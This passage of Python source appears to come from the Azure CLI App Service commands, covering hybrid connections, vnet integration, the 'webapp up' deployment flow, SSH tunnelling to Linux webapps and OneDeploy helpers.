    hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
    hy_co_info = hy_co.id
    # the relay's user metadata carries the endpoint as "<hostname>:<port>"
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    id_parameters = hy_co_info.split("/")
    # populate object with information from the hybrid connection, and set it
    # on webapp
    hc = HybridConnection(service_bus_namespace=id_parameters[8],
                          relay_name=hybrid_connection,
                          relay_arm_uri=hy_co_info,
                          hostname=hostname,
                          port=port,
                          send_key_name="defaultSender",
                          send_key_value=hy_co_keys.primary_key,
                          service_bus_suffix=".servicebus.windows.net")
    if slot is None:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
                                                                           hybrid_connection, hc)
    else:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
                                                                                hybrid_connection, slot, hc)
    # reformats hybrid connection, to prune unnecessary fields
    resourceGroup = return_hc.id.split("/")
    mod_hc = {
        "hostname": return_hc.hostname,
        "id": return_hc.id,
        "location": return_hc.additional_properties["location"],
        "name": return_hc.name,
        "port": return_hc.port,
        "relayArmUri": return_hc.relay_arm_uri,
        "resourceGroup": resourceGroup[4],
        "serviceBusNamespace": return_hc.service_bus_namespace,
        "serviceBusSuffix": return_hc.service_bus_suffix
    }
    return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
    """Point every app on the plan that uses this hybrid connection at the relay's
    primary or secondary "defaultSender" key.

    :param key_type: "primary" or "secondary" (case-insensitive); anything else
        logs a warning and returns None without changing any app.
    :return: the plan's web apps using the hybrid connection, after the update.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)
    # extract the hybrid connection resource group
    asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
                                                                   namespace, hybrid_connection)
    arm_uri = asp_hy_co.relay_arm_uri
    split_uri = arm_uri.split("resourceGroups/")
    resource_group_strings = split_uri[1].split('/')
    relay_resource_group = resource_group_strings[0]
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # calling the relay function to obtain information about the hc in question
    hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)
    hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
    # the relay's user metadata carries the endpoint as "<hostname>:<port>"
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = 0
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    key = "empty"
    if key_type.lower() == "primary":
        key = hy_co_keys.primary_key
    elif key_type.lower() == "secondary":
        key = hy_co_keys.secondary_key
    # ensures input is correct
    if key == "empty":
        logger.warning("Key type is invalid - must be primary or secondary")
        return
    apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
                                                                           hybrid_connection)
    # changes the key for every app that uses that hybrid connection
    for x in apps:
        app_info = ast.literal_eval(x)
        app_name = app_info["name"]
        app_id = app_info["id"]
        id_split = app_id.split("/")
        app_resource_group = id_split[4]
        hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
                              relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
                              send_key_value=key)
        web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
                                                     hybrid_connection, hc)
    return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
    """List the virtual-network connections of an App Service plan."""
    return web_client_factory(cmd.cli_ctx).app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
    """Remove a hybrid connection from a webapp (or slot); warns and no-ops on Linux apps."""
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if webapp.reserved:  # 'reserved' is the ARM flag marking a Linux app
        return logger.warning("hybrid connections not supported on a linux app.")
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot is None:
        return web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
    return web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
                                                  hybrid_connection, slot)
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
    """List a webapp's (or slot's) vnet connections, pruned and with GUID prefixes stripped."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot is None:
        connections = list(web_apps.list_vnet_connections(resource_group_name, name))
    else:
        connections = list(web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
    # reformats each vnet entry, removing unnecessary information
    pruned = []
    for conn in connections:
        # strip the "<guid>_" prefix from the name, and mirror that in the id
        raw_name = conn.name
        display_name = raw_name.split('_', 1)[1] if '_' in raw_name else raw_name
        conn_id = conn.id
        display_id = conn_id.rsplit('/', 1)[0] + '/' + display_name
        pruned.append({"certThumbprint": conn.cert_thumbprint,
                       "id": display_id,
                       "location": conn.additional_properties["location"],
                       "name": display_name,
                       "resourceGroup": conn_id.split('/')[4],
                       "routes": conn.routes,
                       "type": conn.type,
                       "vnetResourceId": conn.vnet_resource_id})
    return pruned
def add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
    """Add regional vnet integration (Swift) between a webapp (or slot) and a subnet.

    Verifies the site supports Swift integration, optionally ensures the subnet is
    delegated to Microsoft.Web/serverFarms, creates the connection, enables
    vnet-route-all on the site config, and returns a pruned summary dict.
    """
    SwiftVirtualNetwork = cmd.get_models('SwiftVirtualNetwork')
    Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
    client = web_client_factory(cmd.cli_ctx)
    vnet_client = network_client_factory(cmd.cli_ctx)
    subnet_resource_id = _validate_subnet(cmd.cli_ctx, subnet, vnet, resource_group_name)
    if slot is None:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection(resource_group_name, name)
    else:
        swift_connection_info = client.web_apps.get_swift_virtual_network_connection_slot(resource_group_name,
                                                                                          name, slot)
    # check to see if the connection would be supported
    if swift_connection_info.swift_supported is not True:
        return logger.warning("""Your app must be in an Azure App Service deployment that is
        capable of scaling up to Premium v2\nLearn more:
        https://go.microsoft.com/fwlink/?linkid=2060115&clcid=0x409""")
    subnet_id_parts = parse_resource_id(subnet_resource_id)
    subnet_subscription_id = subnet_id_parts['subscription']
    vnet_name = subnet_id_parts['name']
    vnet_resource_group = subnet_id_parts['resource_group']
    subnet_name = subnet_id_parts['child_name_1']
    if skip_delegation_check:
        logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
                       ' Missing delegation can cause "Bad Request" error.')
    else:
        from azure.cli.core.commands.client_factory import get_subscription_id
        # delegation can only be validated (and added) within the current subscription
        if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
            logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
                           ' Missing delegation can cause "Bad Request" error.')
        else:
            subnetObj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
            delegations = subnetObj.delegations
            delegated = False
            for d in delegations:
                if d.service_name.lower() == "microsoft.web/serverfarms".lower():
                    delegated = True
            if not delegated:
                subnetObj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
                vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
                                                           subnet_parameters=subnetObj)
    swiftVnet = SwiftVirtualNetwork(subnet_resource_id=subnet_resource_id,
                                    swift_supported=True)
    return_vnet = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                          'create_or_update_swift_virtual_network_connection', slot, swiftVnet)
    # Enable Route All configuration
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.vnet_route_all_enabled is not True:
        config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
    # reformats the vnet entry, removing unnecessary information
    id_strings = return_vnet.id.split('/')
    resourceGroup = id_strings[4]
    mod_vnet = {
        "id": return_vnet.id,
        "location": return_vnet.additional_properties["location"],
        "name": return_vnet.name,
        "resourceGroup": resourceGroup,
        "subnetResourceId": return_vnet.subnet_resource_id
    }
    return mod_vnet
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
    """Resolve the subnet argument to a full subnet resource ID.

    Accepts either a full subnet resource ID (the vnet argument is then only
    sanity-checked), a full vnet resource ID plus a subnet name, or bare
    vnet/subnet names — in which case every vnet in the subscription is
    searched, preferring one in the given resource group.
    """
    if is_valid_resource_id(subnet):
        # Full subnet ID supplied; warn if the vnet argument disagrees with it.
        parsed = parse_resource_id(subnet)
        if not (parsed['name'].lower() == vnet.lower() or subnet.startswith(vnet)):
            logger.warning('Subnet ID is valid. Ignoring vNet input.')
        return subnet

    if is_valid_resource_id(vnet):
        parsed = parse_resource_id(vnet)
        return resource_id(
            subscription=parsed['subscription'],
            resource_group=parsed['resource_group'],
            namespace='Microsoft.Network',
            type='virtualNetworks',
            name=parsed['name'],
            child_type_1='subnets',
            child_name_1=subnet)

    # Reuse logic from existing command to stay backwards compatible
    candidates = []
    for candidate in network_client_factory(cli_ctx).virtual_networks.list_all():
        if vnet in (candidate.name, candidate.id):
            details = parse_resource_id(candidate.id)
            candidates.append((candidate.id, candidate.name, details['resource_group']))
    if not candidates:
        return logger.warning("The virtual network %s was not found in the subscription.", vnet)

    # Prefer a vnet from the app's resource group; otherwise fall back to the first match.
    same_rg = [c for c in candidates if c[2].lower() == resource_group_name.lower()]
    vnet_id, vnet, _ = (same_rg or candidates)[0]
    if len(candidates) > 1:
        logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
                       "To use a different virtual network, specify the virtual network resource ID using --vnet.",
                       vnet, vnet_id)
    parsed = parse_resource_id(vnet_id)
    return resource_id(
        subscription=parsed['subscription'],
        resource_group=parsed['resource_group'],
        namespace='Microsoft.Network',
        type='virtualNetworks',
        name=parsed['name'],
        child_type_1='subnets',
        child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
    """Delete the Swift virtual-network connection from a webapp or one of its slots."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is not None:
        return client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
    return client.web_apps.delete_swift_virtual_network(resource_group_name, name)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """List the run history of a triggered webjob on an app or one of its slots."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
    return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None,  # pylint: disable=too-many-statements,too-many-branches
              os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
              app_service_environment=None):
    """Create (or reuse) everything needed to run the code in the current directory, then deploy it.

    Detects the language/runtime from the current working directory (or takes
    --runtime), resolves or creates the resource group, App Service plan and
    webapp, zips the directory and zip-deploys it. With --dryrun the planned
    configuration is returned without creating anything. On success the chosen
    defaults (group, sku, appserviceplan, location, web) are persisted to the
    CLI's local config so subsequent commands can omit them.
    """
    if not name:
        name = generate_default_app_name(cmd)
    import os
    AppServicePlan = cmd.get_models('AppServicePlan')
    src_dir = os.getcwd()
    # Escape path separators so the path survives the JSON round-trip below
    _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
    client = web_client_factory(cmd.cli_ctx)
    user = get_profile_username()
    _create_new_rg = False
    _site_availability = get_site_availability(cmd, name)
    # Name available => the app does not exist yet and must be created
    _create_new_app = _site_availability.name_available
    os_name = os_type if os_type else detect_os_form_src(src_dir, html)
    _is_linux = os_name.lower() == 'linux'
    if runtime and html:
        raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
    if runtime:
        # Validate the user-supplied runtime against the supported stacks
        helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
        runtime = helper.remove_delimiters(runtime)
        match = helper.resolve(runtime)
        if not match:
            if _is_linux:
                raise CLIError("Linux runtime '{}' is not supported."
                               " Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
            raise CLIError("Windows runtime '{}' is not supported."
                           " Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
        language = runtime.split('|')[0]
        version_used_create = '|'.join(runtime.split('|')[1:])
        detected_version = '-'
    else:
        # detect the language and version from the contents of the source directory
        _lang_details = get_lang_from_content(src_dir, html)
        language = _lang_details.get('language')
        _data = get_runtime_version_details(_lang_details.get('file_loc'), language)
        version_used_create = _data.get('to_create')
        detected_version = _data.get('detected')
    runtime_version = "{}|{}".format(language, version_used_create) if \
        version_used_create != "-" else version_used_create
    site_config = None
    if not _create_new_app:  # App exists, or App name unavailable
        if _site_availability.reason == 'Invalid':
            raise CLIError(_site_availability.message)
        # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
        logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
                           "is a part of the current subscription if updating an existing app. If creating "
                           "a new app, app names must be globally unique. Please try a more unique name or "
                           "leave unspecified to receive a randomly generated name.".format(name))
        current_rg = app_details.resource_group
        # Any explicit RG/plan/location argument must agree with the existing app
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        rg_name = resource_group_name or current_rg
        if location is None:
            loc = app_details.location.replace(" ", "").lower()
        else:
            loc = location.replace(" ", "").lower()
        plan_details = parse_resource_id(app_details.server_farm_id)
        current_plan = plan_details['name']
        if plan is not None and current_plan.lower() != plan.lower():
            raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
                           "Please check if you have configured defaults for plan name and re-run command."
                           .format(plan, current_plan))
        plan = plan or plan_details['name']
        plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
        sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
        current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise error if current OS of the app is different from the current one
        if current_os.lower() != os_name.lower():
            raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
                           "'{}'. Please create a new app "
                           "to continue this operation. For more information on default behaviors, "
                           "see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
                           .format(name, current_os, src_dir, os_name))
        _is_linux = plan_info.reserved
        # for an existing app check if the runtime version needs to be updated
        # Get site config to check the runtime version
        site_config = client.web_apps.get_configuration(rg_name, name)
    else:  # need to create new app, check if we need to use default RG or use user entered values
        logger.warning("The webapp '%s' doesn't exist", name)
        sku = get_sku_to_use(src_dir, html, sku, runtime)
        loc = set_location(cmd, sku, location)
        rg_name = get_rg_to_use(user, loc, os_name, resource_group_name)
        _create_new_rg = not check_resource_group_exists(cmd, rg_name)
        plan = get_plan_to_use(cmd=cmd,
                               user=user,
                               os_name=os_name,
                               loc=loc,
                               sku=sku,
                               create_rg=_create_new_rg,
                               resource_group_name=rg_name,
                               plan=plan)
    # JSON summary of what will be (or was) created; also the --dryrun return value
    dry_run_str = r""" {
            "name" : "%s",
            "appserviceplan" : "%s",
            "resourcegroup" : "%s",
            "sku": "%s",
            "os": "%s",
            "location" : "%s",
            "src_path" : "%s",
            "runtime_version_detected": "%s",
            "runtime_version": "%s"
            }
            """ % (name, plan, rg_name, get_sku_name(sku), os_name, loc, _src_path_escaped, detected_version,
                   runtime_version)
    create_json = json.loads(dry_run_str)
    if dryrun:
        logger.warning("Web app will be created with the below configuration,re-run command "
                       "without the --dryrun flag to create & deploy a new app")
        return create_json
    if _create_new_rg:
        logger.warning("Creating Resource group '%s' ...", rg_name)
        create_resource_group(cmd, rg_name, loc)
        logger.warning("Resource group creation complete")
    # create ASP
    logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
    # updated we update those
    try:
        create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
                                number_of_workers=1 if _is_linux else None, location=loc,
                                app_service_environment=app_service_environment)
    except Exception as ex:  # pylint: disable=broad-except
        if ex.response.status_code == 409:  # catch 409 conflict when trying to create existing ASP in diff location
            try:
                response_content = json.loads(ex.response._content.decode('utf-8'))  # pylint: disable=protected-access
            except Exception:  # pylint: disable=broad-except
                raise CLIInternalError(ex)
            raise UnclassifiedUserFault(response_content['error']['message'])
        raise AzureResponseError(ex)
    if _create_new_app:
        logger.warning("Creating webapp '%s' ...", name)
        create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
                      using_webapp_up=True, language=language)
        _configure_default_logging(cmd, rg_name, name)
    else:  # for existing app if we might need to update the stack runtime settings
        helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
        match = helper.resolve(runtime_version)
        if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
            if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
                logger.warning('Updating runtime version from %s to %s',
                               site_config.linux_fx_version, match['configs']['linux_fx_version'])
                update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
                logger.warning('Waiting for runtime version to propagate ...')
                time.sleep(30)  # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
            elif not match:
                logger.warning('Updating runtime version from %s to %s',
                               site_config.linux_fx_version, runtime_version)
                update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
                logger.warning('Waiting for runtime version to propagate ...')
                time.sleep(30)  # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
        elif os_name.lower() == 'windows':
            # may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
            if match:
                _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
        create_json['runtime_version'] = runtime_version
    # Zip contents & Deploy
    logger.warning("Creating zip with contents of dir %s ...", src_dir)
    # zip contents & deploy
    zip_file_path = zip_contents_from_dir(src_dir, language)
    enable_zip_deploy(cmd, rg_name, name, zip_file_path)
    if launch_browser:
        logger.warning("Launching app using default browser")
        view_in_browser(cmd, rg_name, name, None, logs)
    else:
        _url = _get_url(cmd, rg_name, name)
        logger.warning("You can launch the app at %s", _url)
        create_json.update({'URL': _url})
    if logs:
        _configure_default_logging(cmd, rg_name, name)
        return get_streaming_log(cmd, rg_name, name)
    # Persist the effective choices as CLI defaults for future invocations
    with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
        cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
        cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
        cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
        cmd.cli_ctx.config.set_value('defaults', 'location', loc)
        cmd.cli_ctx.config.set_value('defaults', 'web', name)
    return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
    """Bring a Windows webapp's stack runtime settings in line with the resolved runtime.

    Node runtimes are configured through app settings; every other Windows
    runtime through site-config properties. When anything changed, the portal's
    CURRENT_STACK metadata is refreshed and we wait for the new runtime to
    propagate to Kudu before the caller zip-deploys.
    """
    update_needed = False
    if 'node' in runtime_version:
        # Node: the runtime version lives in app settings rather than site config
        settings = []
        for k, v in match['configs'].items():
            for app_setting in site_config.app_settings:
                if app_setting.name == k and app_setting.value != v:
                    update_needed = True
                    # BUGFIX: list.append takes exactly one argument; the original
                    # `settings.append('%s=%s', k, v)` raised TypeError instead of
                    # building the 'KEY=VALUE' entry expected by update_app_settings.
                    settings.append('%s=%s' % (k, v))
        if update_needed:
            logger.warning('Updating runtime version to %s', runtime_version)
            update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
    else:
        # Non-node Windows runtimes: compare and patch the site-config properties directly
        for k, v in match['configs'].items():
            if getattr(site_config, k, None) != v:
                update_needed = True
                setattr(site_config, k, v)
        if update_needed:
            logger.warning('Updating runtime version to %s', runtime_version)
            update_site_configs(cmd,
                                rg_name,
                                name,
                                net_framework_version=site_config.net_framework_version,
                                php_version=site_config.php_version,
                                python_version=site_config.python_version,
                                java_version=site_config.java_version,
                                java_container=site_config.java_container,
                                java_container_version=site_config.java_container_version)
    current_stack = get_current_stack_from_runtime(runtime_version)
    _update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
    if update_needed:
        logger.warning('Waiting for runtime version to propagate ...')
        time.sleep(30)  # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
    """Set the CURRENT_STACK metadata property when missing or stale.

    The portal uses this metadata value to display the correct runtime for
    Windows webapps; a falsy current_stack is a no-op.
    """
    if not current_stack:
        return
    client = web_client_factory(cmd.cli_ctx)
    metadata = client.web_apps.list_metadata(resource_group, name)
    props = metadata.properties
    if 'CURRENT_STACK' not in props or props["CURRENT_STACK"] != current_stack:
        props["CURRENT_STACK"] = current_stack
        client.web_apps.update_metadata(resource_group, name, metadata=metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
    """Wake up the Kudu (SCM) site by issuing an authenticated GET against it.

    Works around timeout issues on Linux by warming the SCM site before use.
    An optional instance name pins the request to a specific scaled-out worker
    via the ARRAffinity cookie.
    """
    import urllib3
    import requests
    from azure.cli.core.util import should_disable_connection_verify

    username, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
    scm_url = _get_scm_url(cmd, resource_group, name)
    auth_headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
    cookies = {'ARRAffinity': instance} if instance is not None else {}
    requests.get(scm_url + '/api/settings', headers=auth_headers,
                 verify=not should_disable_connection_verify(), cookies=cookies)
def is_webapp_up(tunnel_server):
    """Return whether the tunnelled webapp is currently reachable."""
    status = tunnel_server.is_webapp_up()
    return status
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
    """Build and return a TunnelServer connected to a Linux webapp's SCM site.

    Validates that the app runs on a Linux plan and, when given, that the
    requested scale-out instance exists (case-sensitive), wakes up Kudu,
    and waits until the app responds before returning.
    """
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if not webapp.reserved:  # 'reserved' is set only for Linux plans
        raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")

    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    deploy_user = next(p['userName'] for p in profiles)
    deploy_password = next(p['userPWD'] for p in profiles)

    if port is None:
        port = 0  # Will auto-select a free port from 1024-65535
        logger.info('No port defined, creating on random free port')

    # Validate that we have a known instance (case-sensitive)
    if instance is not None:
        known_instances = {i.name for i in list_instances(cmd, resource_group_name, name, slot=slot)}
        if instance not in known_instances:
            if slot is not None:
                raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
            raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))

    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    tunnel_server = TunnelServer('', port, scm_url, deploy_user, deploy_password, instance)
    _ping_scm_site(cmd, resource_group_name, name, instance=instance)
    _wait_for_webapp(tunnel_server)
    return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a TCP tunnel to a Linux webapp and keep it alive until timeout or Ctrl+C."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)

    worker = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    worker.daemon = True
    worker.start()

    logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
    else:
        # Default credentials for the App Service SSH endpoint inside the container
        logger.warning('SSH is available { username: %s, password: %s }', 'root', 'Docker!')
    logger.warning('Ctrl + C to close')

    if timeout:
        time.sleep(int(timeout))
    else:
        # Block as long as the tunnel thread keeps running
        while worker.is_alive():
            time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a tunnel to a Linux webapp and attach an interactive SSH session over it."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)

    tunnel_thread = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    tunnel_thread.daemon = True
    tunnel_thread.start()

    # Default credentials for the App Service SSH endpoint inside the container
    ssh_thread = threading.Thread(target=_start_ssh_session,
                                  args=('localhost', tunnel_server.get_port(), 'root', 'Docker!'))
    ssh_thread.daemon = True
    ssh_thread.start()

    if timeout:
        time.sleep(int(timeout))
    else:
        # Stay alive while both the tunnel and the SSH session are running
        while ssh_thread.is_alive() and tunnel_thread.is_alive():
            time.sleep(5)
def perform_onedeploy(cmd,
                      resource_group_name,
                      name,
                      src_path=None,
                      src_url=None,
                      target_path=None,
                      artifact_type=None,
                      is_async=None,
                      restart=None,
                      clean=None,
                      ignore_stack=None,
                      timeout=None,
                      slot=None):
    """Deploy an artifact (local file or URL) to a webapp via the OneDeploy API."""
    params = OneDeployParams()
    # Map CLI arguments onto the parameter bag consumed by the OneDeploy helpers
    for attr, value in (('cmd', cmd),
                        ('resource_group_name', resource_group_name),
                        ('webapp_name', name),
                        ('src_path', src_path),
                        ('src_url', src_url),
                        ('target_path', target_path),
                        ('artifact_type', artifact_type),
                        ('is_async_deployment', is_async),
                        ('should_restart', restart),
                        ('is_clean_deployment', clean),
                        ('should_ignore_stack', ignore_stack),
                        ('timeout', timeout),
                        ('slot', slot)):
        setattr(params, attr, value)
    return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
    """Plain parameter bag passed between the OneDeploy helper functions."""

    def __init__(self):
        # CLI context and target app
        self.cmd = None
        self.resource_group_name = None
        self.webapp_name = None
        self.slot = None
        # Artifact source and destination
        self.src_path = None
        self.src_url = None
        self.artifact_type = None
        self.target_path = None
        # Deployment behavior flags
        self.is_async_deployment = None
        self.should_restart = None
        self.is_clean_deployment = None
        self.should_ignore_stack = None
        self.timeout = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
    """Compose the Kudu /api/publish URL with query args for each supplied deployment option."""
    scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
    url = scm_url + '/api/publish?type=' + params.artifact_type
    # Boolean-ish options are stringified; omitted (None) options add no query arg
    for query_key, value in (('async', params.is_async_deployment),
                             ('restart', params.should_restart),
                             ('clean', params.is_clean_deployment),
                             ('ignorestack', params.should_ignore_stack)):
        if value is not None:
            url = url + '&' + query_key + '=' + str(value)
    if params.target_path is not None:
        url = url + '&path=' + params.target_path
    return url
def _get_onedeploy_status_url(params):
    """Return the Kudu endpoint that reports the latest deployment's status."""
    base_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
    return '{}/api/deployments/latest'.format(base_url)
def _get_basic_headers(params):
    """Build authenticated HTTP headers for a OneDeploy request.

    Content type is octet-stream for a local artifact and JSON for a URL-based
    one; raises CLIError when neither source is given.
    """
    import urllib3

    user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
                                               params.webapp_name, params.slot)
    if params.src_path:
        content_type = 'application/octet-stream'
    elif params.src_url:
        content_type = 'application/json'
    else:
        raise CLIError('Unable to determine source location of the artifact being deployed')

    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    headers.update({
        'Cache-Control': 'no-cache',
        'User-Agent': get_az_user_agent(),
        'Content-Type': content_type,
    })
    return headers
def _get_onedeploy_request_body(params):
    """Return the request payload: raw file bytes for a local path, a JSON document for a URL."""
    import os

    if params.src_path:
        logger.info('Deploying from local path: %s', params.src_path)
        try:
            artifact_path = os.path.realpath(os.path.expanduser(params.src_path))
            with open(artifact_path, 'rb') as artifact:
                return artifact.read()
        except Exception as e:  # pylint: disable=broad-except
            raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
                           .format(params.src_path)) from e
    if params.src_url:
        logger.info('Deploying from URL: %s', params.src_url)
        return json.dumps({
            "packageUri": params.src_url
        })
    raise CLIError('Unable to determine source location of the artifact being deployed')
def _update_artifact_type(params):
    """Infer the OneDeploy artifact type from the source file's extension when --type is absent.

    Known code extensions map to themselves, scripts map to 'startup', and
    anything else (including files without an extension) falls back to 'static'.
    Mutates params.artifact_type in place and warns about the choice.
    """
    import ntpath

    if params.artifact_type is not None:
        return

    # Interpret deployment type from the file extension if the type parameter is not passed
    file_name = ntpath.basename(params.src_path)
    name_parts = file_name.split(".", 1)
